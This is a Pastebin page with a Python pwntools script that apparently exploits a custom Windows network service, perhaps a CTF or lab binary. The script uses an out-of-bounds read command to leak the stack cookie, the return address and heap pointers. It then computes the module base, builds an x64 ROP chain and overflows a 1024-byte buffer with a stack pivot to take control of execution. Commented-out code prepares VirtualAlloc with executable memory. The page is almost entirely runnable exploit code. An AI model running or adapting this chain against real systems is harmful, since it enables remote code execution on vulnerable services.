API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 15th, 2019
145
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.55 KB | None | 0 0
raw download clone embed print report
  1. import socket
  2. import time
  3. from pwn import *
  4.  
  5. context.os = 'linux'
  6. context.arch = 'amd64'
  7. # context.log_level = 'DEBUG'
  8. # HOST = '172.27.223.171'
  9. HOST = '192.168.1.34'
  10. PORT = 741        
  11.  
  12. elf = remote(HOST, PORT)
  13.  
  14. def send_data(data):
  15.     elf.send(data)
  16.     time.sleep(0.2)
  17.  
  18. def recv_data():
  19.     return elf.recv()
  20.  
  21. def send_cmd1(data):
  22.     header = b'\x01\x00\x00\x00'
  23.     l = bytes([int(len(data) / 2)>>2])
  24.     header += l
  25.     send_data(header + data)
  26.  
  27. def leak_nth_dword(n):
  28.     start = bytes([n*2])
  29.     send_data(b'\x04\x00\x00\x01' + start)
  30.     four_bytes = recv_data()
  31.     send_data(b'\x04\x00\x00\x01' + bytes([int.from_bytes(start, 'little') + 1]))
  32.     four_bytes += recv_data()
  33.     return four_bytes
  34.  
  35. print("Leaking stuff...")
  36. leaked_cookie = u64(leak_nth_dword(0))
  37. print("Leaked cookie : {}".format(hex(leaked_cookie)))
  38. leaked_mem_priv = u64(leak_nth_dword(1))
  39. print("Leaked memory privleges : {}".format(hex(leaked_mem_priv)))
  40. leacked_sockfd = u64(leak_nth_dword(2))
  41. print("Leaked socket : {}".format(hex(leacked_sockfd)))
  42. leacked_ret = u64(leak_nth_dword(3))
  43. print("Leakead ret : {}".format(hex(leacked_ret)))
  44. leaked_allocBuffer = u64(leak_nth_dword(4))
  45. print("Leakead allocated buffer on heap : {}".format(hex(leaked_allocBuffer)))
  46. base_addr = leacked_ret - 0x2507
  47. print("Computed base addr : {}".format(hex(base_addr)))
  48.  
  49. pop_rsp_ret = base_addr + 0x4d4a
  50. syscall = base_addr + 0x33acc
  51. pop_rcx_ret = base_addr + 0x13603
  52. pop_rdx_ret = base_addr + 0x1b4be
  53. pop_r8_ret = base_addr + 0x3a6d
  54. pop_rcx_ret = base_addr + 0x13603
  55. pop_rax_ret = base_addr + 0x3a6e
  56. pop_rbx_ret = base_addr + 0x132c
  57. j_rax = base_addr + 0x907d
  58. call_qword_ptr_rax_add_rsp_0x38_ret = base_addr + 0x194a
  59. cmovne_r9d_r8d_movzx_eax_r9d_ret = base_addr + 0x752cb
  60. xor_rax_rax_ret = base_addr + 0x3148f
  61. xor_eax_edx_ret = base_addr + 0x3113c
  62. add_resp_0x28_ret = base_addr + 0x1194
  63.  
  64. mov_rcx_rax_call_qwordptr_r8 = base_addr + 0x1946
  65.  
  66. print("Starting ROP ...".format(hex(pop_rsp_ret)))
  67.  
  68. GetModuleHandleWAddr = base_addr + 0x7b1f8
  69. LoadLibraryExWAddr = base_addr + 0x7b2d8
  70. CreateThreadAddr = base_addr + 0x7b0a8
  71. ResumeThreadAddr = base_addr + 0x7b0f0
  72. VirtuallAllocAddr = base_addr + 0x7b098
  73. GetProcAddressAddr = base_addr + 0x7b0b8
  74. ReadFileAddr = base_addr + 0x7b088
  75.  
  76. start_rop = leaked_allocBuffer + 0x230 # Keep some space for structures etc...
  77. ropchain = b''
  78. ropchain += b'\x00' * 11
  79.  
  80. ropchain += b'w\x00s\x002\x00_\x003\x002\x00.\x00d\x00l\x00l\x00\x00'
  81. ropchain += b'\x00' * 11
  82. ropchain += b'A' * 0x200
  83. ropchain += p64(pop_rcx_ret)
  84. ropchain += p64(leaked_allocBuffer + 0x10)  # Lstr_kernel32
  85. ropchain += p64(pop_rax_ret)
  86. ropchain += p64(GetModuleHandleWAddr)
  87. ropchain += p64(call_qword_ptr_rax_add_rsp_0x38_ret) # call [rax]; add rsp, 38; ret
  88. ropchain += b'B' * (0x38)
  89.  
  90. # Ret to send instruction base_addr + 0x25b9
  91. ropchain += p64(pop_rcx_ret)
  92. ropchain += p64(leacked_sockfd)
  93. ropchain += p64(pop_rdx_ret)
  94. ropchain += p64(leaked_allocBuffer + 0x258 + 0x10)
  95. ropchain += p64(pop_r8_ret)
  96. ropchain += p64(0x0)
  97. ropchain += p64(xor_eax_edx_ret) # TO UNSET ZERO FLAG for cmovne
  98. ropchain += p64(cmovne_r9d_r8d_movzx_eax_r9d_ret)
  99. ropchain += p64(pop_r8_ret)
  100. ropchain += p64(0x8)
  101. ropchain += p64(pop_rax_ret)
  102. ropchain += p64(base_addr + 0x25b9)
  103. ropchain += p64(j_rax)
  104.  
  105. # # VirtualAlloc to up memory size
  106. # ropchain += p64(pop_rcx_ret)
  107. # ropchain += p64(leaked_allocBuffer)
  108. # ropchain += p64(pop_rdx_ret)
  109. # ropchain += p64(0x1000)
  110. # ropchain += p64(pop_r8_ret)
  111. # ropchain += p64(0x40)           # Make it executable why not ...
  112. # ropchain += p64(xor_eax_edx_ret) # TO UNSET ZERO FLAG for cmovne
  113. # ropchain += p64(cmovne_r9d_r8d_movzx_eax_r9d_ret)
  114. # ropchain += p64(pop_r8_ret)
  115. # ropchain += p64(0x1000)
  116. # ropchain += p64(pop_rax_ret)
  117. # ropchain += p64(VirtuallAllocAddr)
  118. # ropchain += p64(call_qword_ptr_rax_add_rsp_0x38_ret)
  119. # ropchain += b'B' * 0x38
  120. # ropchain += p64(pop_rax_ret)
  121. # ropchain += p64(leaked_allocBuffer + 0x1b8)
  122. # ropchain += p64(j_rax)
  123.  
  124. # ropchain += p64(pop_r8_ret)
  125. # ropchain += p64(GetProcAddressAddr)
  126. # ropchain += p64(pop_rdx_ret)
  127. # ropchain += p64(leaked_allocBuffer + 0x30)
  128. # ropchain += p64(mov_rcx_rax_call_qwordptr_r8)
  129.  
  130.  
  131. payload = ropchain + b'C' * (1024 - len(ropchain)) # Add padding to get to the ret addr
  132.  
  133. payload += p64(leaked_cookie)
  134. payload += p64(leaked_mem_priv)
  135. payload += p64(leacked_sockfd)
  136. payload += p64(pop_rsp_ret)         # Override ret to pop rsp
  137. payload += p64(start_rop)           # Stack pivot rsp to allocated buffer on heap (+0x8)
  138.  
  139. send_cmd1(payload)
  140.  
  141. send_data(b'\x05')
  142.  
  143. print(recv_data())
  144.  
  145. elf.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!